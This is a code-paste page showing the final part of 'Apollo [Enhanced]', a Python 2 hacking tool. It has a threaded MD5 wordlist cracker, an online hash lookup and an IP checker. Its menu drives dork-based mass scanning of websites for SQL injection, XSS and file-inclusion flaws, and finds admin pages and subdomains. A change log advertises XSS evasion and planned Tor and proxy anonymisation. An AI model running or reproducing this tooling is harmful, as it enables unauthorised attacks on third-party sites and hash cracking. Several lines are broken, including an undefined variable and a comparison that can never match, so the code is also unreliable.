  753. thread.start()
  754. queue.join()
  755.  
  756.  
  757. class Cracker(threading.Thread):
  758. """Use a wordlist to try and brute the hash"""
  759. def __init__(self, queue, hashm):
  760. threading.Thread.__init__(self)
  761. self.queue = queue
  762. self.hashm = hashm
  763.  
  764. def run(self):
  765. """Hash word and check against hash"""
  766. while True:
  767. try:
  768. word = self.queue.get(False)
  769. except Queue.Empty:
  770. break
  771. tmp = hashlib.md5(word).hexdigest()
  772. if tmp == self.hashm:
  773. self.result(word)
  774. self.queue.task_done()
  775.  
  776. def result(self, words):
  777. """Print result if found"""
  778. print self.hashm + ' = '+Words
  779.  
  780. def word():
  781. """Create queue and threads for hash crack"""
  782. queue = Queue.Queue()
  783. wordlist = raw_input('Wordlist: ')
  784. hashm = raw_input('Enter MD5 hash: ')
  785. read = open(wordlist)
  786. for words in read:
  787. words = words.replace("\n","")
  788. queue.put(words)
  789. read.close()
  790. for i in range(5):
  791. thread = Cracker(queue, hashm)
  792. thread.setDaemon(True)
  793. thread.start()
  794. queue.join()
  795.  
  796.  
  797. class OnlineCrack:
  798. """Use online service to check for hash"""
  799.  
  800. def crack(self):
  801. """Connect and check hash"""
  802. hashm = raw_input('Enter MD5 Hash: ')
  803. conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm))
  804. conn.add_header('User-Agent', choice(USER_AGENT))
  805. opener = urllib2.build_opener()
  806. opener.open(conn)
  807. data = opener.open(conn).read()
  808. if data == 'No results returned.':
  809. print '\n-[!]- Not found!'
  810. if data == 'Cleartext of':
  811. print '\n-[!]- %s' % (data)
  812.  
  813.  
  814. class Check:
  815. """IP address Checker"""
  816.  
  817. def grab(self):
  818. """Connect to site and grab IP"""
  819. site = 'http://www.tracemyip.org/'
  820. try:
  821. conn = urllib2.Request(site)
  822. conn.add_header('User-Agent', choice(USER_AGENT))
  823. opener = urllib2.build_opener()
  824. opener.open(conn)
  825. data = opener.open(conn).read()
  826. start = 0
  827. end = len(data)
  828. start = data.find('onClick="', start, end)
  829. end = data.find('size=', start, end)
  830. ip_add = data[start+46:end-2].strip()
  831. print B+'\n-[!]- Your IP Address Is '+R+'%s' % (ip_add) +W
  832.  
  833.  
  834. except urllib2.HTTPError:
  835. print '-[!]- Error connecting'
  836.  
  837.  
  838. def output():
  839. """Outputs dork scan results to screen"""
  840. print '\n>> ' + str(vuln) + G+' Vulnerable Sites Found'+W
  841. print '>> ' + str(invuln) + G+' Sites Not Vulnerable'+W
  842. print '>> ' + str(np) + R+' Sites Without Parameters'+W
  843. if option == '1':
  844. print '>> Output Saved To sqli-result.txt\n'
  845. elif option == '2':
  846. print '>> Output Saved To lfi-result.txt'
  847. elif option == '3':
  848. print '>> Output Saved To xss-result.txt'
  849. elif option == '4':
  850. print '>> Output Saved To rfi-result.txt'
  851.  
  852.  
  853. W = "\033[0m";
  854. R = "\033[31m";
  855. G = "\033[32m";
  856. O = "\033[33m";
  857. B = "\033[34m";
  858.  
  859. def main():
  860. """Outputs Menu and gets input"""
  861. print (O+'''
  862. Apollo [Enhanced]
  863. by madhatter
  864.  
  865. Original by Sotd
  866. github.com/SotdCode/Apollo''')
  867. print (G+'''
  868. -[1]- SQL Injection
  869. -[2]- Cross Site Scripting
  870. -[3]- Local File Incursion
  871. -[4]- Remote File Incursion
  872. -[5]- Admin Page Finder
  873. -[6]- Sub Domain Finder
  874. -[7]- Dictionary MD5 cracker
  875. -[8]- Online MD5 cracker
  876. -[9]- IP Address Checker
  877. -[10]- See What Changed''')
  878. print W
  879. global option
  880. option = raw_input('-[!]- Enter Option: ')
  881.  
  882. if option:
  883. if option == '1':
  884. Crawl()
  885. output()
  886.  
  887. elif option == '2':
  888. Crawl()
  889. output()
  890.  
  891. elif option == '3':
  892. Crawl()
  893. output()
  894.  
  895. elif option == '4':
  896. Crawl()
  897. output()
  898.  
  899. elif option == '5':
  900. admin()
  901. aprint()
  902.  
  903. elif option == '6':
  904. subd()
  905.  
  906. elif option == '7':
  907. word()
  908.  
  909. elif option == '8':
  910. OnlineCrack().crack()
  911.  
  912. elif option == '9':
  913. Check().grab()
  914.  
  915. elif option == '10':
  916. print(O+'''\n--- Changes Made in Enhanced Apollo ---''')
  917. print(G+'''
  918. = Apollo now scan wider range of SQL DBs
  919. ---- MySQL [More errors]
  920. ---- MsSQL [More errors]
  921. ---- Oracle/JBDC
  922. ---- ODBC
  923. ---- OLEDB
  924. ---- JETDB
  925. ---- ADODB
  926. ---- ProgreSQL
  927. ---- Sybase
  928. = XSS added evasion
  929. = Removed paramiko, due to errors
  930. = Added Color UI
  931. = Added more admin pages''')
  932. print(O+'''\n--- Future Plans ---''')
  933. print(G+'''
  934. = Random User Agent [WIP]
  935. = TOR/Polipo [WIP]
  936. = SSH tunnelling (better than paramiko)
  937. = Online Proxy Grabber [WIP]
  938. = More detail on IP [WIP]
  939. = SQL Column Counter [WIP]
  940. = Persistent XSS finder
  941. = XSS finder with manual options
  942. = SQLi with manual options''')
  943. print(B+'''\n## Contact at [email protected] ##''')
  944. print W
  945.  
  946. else:
  947. print R+'\nInvalid Choice\n'+W
  948. time.sleep(0.5)
  949. main()
  950.  
  951. else:
  952. print R+'\nYou Must Enter An Option\n'+W
  953. time.sleep(0.5)
  954. main()
  955.  
  956. if __name__ == '__main__':
  957. main()
  958. elif conf.get("threads", 0) > 1:
  959. os._exit(0)

URL: https://github.com/SotdCode

Report this snippet


Comments

RSS Icon Subscribe to comments

You need to login to post a comment.